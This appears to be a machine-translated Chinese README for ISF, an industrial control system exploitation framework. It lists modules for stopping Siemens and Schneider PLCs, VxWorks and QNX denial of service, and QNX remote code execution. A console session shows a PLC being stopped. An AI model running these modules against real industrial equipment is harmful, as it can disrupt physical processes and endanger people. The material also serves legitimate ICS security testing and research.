國際安全聯合會
ve release
ISF(工業開發框架)是一個基於Python的開發框架,它類似於metasploit框架。
ISF 是基於開源專案 routersploit。
閱讀其他語言版本:英文、簡體中文、
未經雙方事先同意,使用 ISF 攻擊目標是非法的。最終使用者有責任遵守所有適用的地方、州和聯邦法律。開發者不承擔任何責任,也不對本程式造成的任何誤用或損壞負責。
姓名 | 小路 | 描述 |
---|---|---|
modbus_tcp_客戶端 | icssploit/客戶端/modbus_tcp_client.py | Modbus-TCP 用戶端 |
wdb2_客戶端 | icssploit/客戶端/wdb2_client.py | WdbRPC 版本 2 用戶端(Vxworks 6.x) |
s7_客戶端 | icssploit/客戶端/s7_client.py | s7comm客戶端(S7 300/400 PLC) |
姓名 | 小路 | 描述 |
---|---|---|
s7_300_400_plc_control | 漏洞利用/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC啟動/停止 |
s7_1200_plc_control | 漏洞利用/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC啟動/停止/重位 |
vxworks_rpc_dos | 漏洞/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC遠端dos(CVE-2015-7599) |
量子_140_plc_control | 漏洞利用/plcs/schneider/quantum_140_plc_control.py | 施耐德Quantum 140系列PLC啟動/停止 |
crash_qnx_inetd_tcp_service | 漏洞利用/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP 服務 dos |
qconn_remote_exec | 漏洞利用/plcs/qnx/qconn_remote_exec.py | QNX qconn 遠端程式碼執行 |
Profinet_設定_IP | 漏洞利用/plcs/siemens/profinet_set_ip.py | Profinet DCP 設備 IP 配置 |
姓名 | 小路 | 描述 |
---|---|---|
Profinet_dcp_scan | 掃描器/profinet_dcp_scan.py | Profinet DCP 掃描儀 |
vxworks_6_scan | 掃描器/vxworks_6_scan.py | Vxworks 6.x 掃描儀 |
s7comm_scan | 掃描器/s7comm_scan.py | S7通訊掃描儀 |
enip_scan | 掃描器/enip_scan.py | 乙太網路IP掃描儀 |
這些協定可以在其他 Fuzzing 框架(如 Kitty)中使用或建立您自己的用戶端。
姓名 | 小路 | 描述 |
---|---|---|
PN_DCP | icssploit/協定/pn_dcp | Profinet DCP 協定 |
modbus_tcp | icssploit/協定/modbus_tcp | Modbus TCP 協定 |
WDBRPC2 | icssploit/協定/wdbrpc2 | WDB RPC 版本 2 協議 |
s7通訊 | icssploit/協議/s7comm.py | S7通訊協議 |
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ | | / __ _ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | ___ \___ | ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|__________|_____/_____/|_| |__________/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
您可以使用 Tab 鍵完成。
isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu
References:
isf (S7-300/400 PLC Control) >